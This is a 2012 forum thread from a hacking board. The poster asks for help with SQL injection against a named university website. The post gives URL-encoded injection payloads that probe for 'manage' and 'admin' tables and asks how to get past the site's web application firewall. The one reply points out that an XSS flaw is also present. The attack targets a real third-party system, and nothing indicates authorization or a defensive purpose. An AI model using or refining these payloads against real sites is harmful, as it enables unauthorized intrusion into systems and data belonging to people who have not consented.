Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
a weird injection...
Posted by: Desperado
Date: May 14, 2012 05:32AM

web:http://jsjx.hnie.edu.cn/style.asp?id=1360

the waf show that we can't use "and update insert...."

if i inject "http://jsjx.hnie.edu.cn/style.asp?id=1360%20and%20%28select%20count%28*%29%20from%20manage%29%3E0"

it can show me some information:the table manage not exist.

But if http://jsjx.hnie.edu.cn/style.asp?id=1360%20and%20%28select%20count%28*%29%20from%20admin%29%3E0

It will appear the waf.
Any help?????

Options: ReplyQuote
Re: a weird injection...
Posted by: Skyphire
Date: May 14, 2012 08:09PM

well, at least you got an XSS.

Options: ReplyQuote


Sorry, only registered users may post in this forum.